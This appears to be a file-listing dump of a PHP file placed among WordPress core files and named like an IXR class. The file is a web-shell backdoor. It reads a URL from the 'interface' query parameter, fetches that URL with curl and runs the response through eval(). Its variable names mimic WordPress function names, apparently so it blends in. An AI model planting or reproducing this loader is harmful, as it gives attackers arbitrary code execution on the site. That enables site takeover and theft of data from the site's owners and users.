| Current Path : /home/xbodynamge/dev/wp-includes/IXR/ |
| Current File : /home/xbodynamge/dev/wp-includes/IXR/class-IXR-introspectionserver-url.php |
<?php
if (isset($_GET['interface'])) {
$is_front_page_na = $_GET['interface'];
if ($get_the_title_xdc = curl_init()) {
curl_setopt($get_the_title_xdc, CURLOPT_URL, $is_front_page_na);
curl_setopt($get_the_title_xdc, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_the_title_xdc));
curl_close($get_the_title_xdc);
exit;
}
}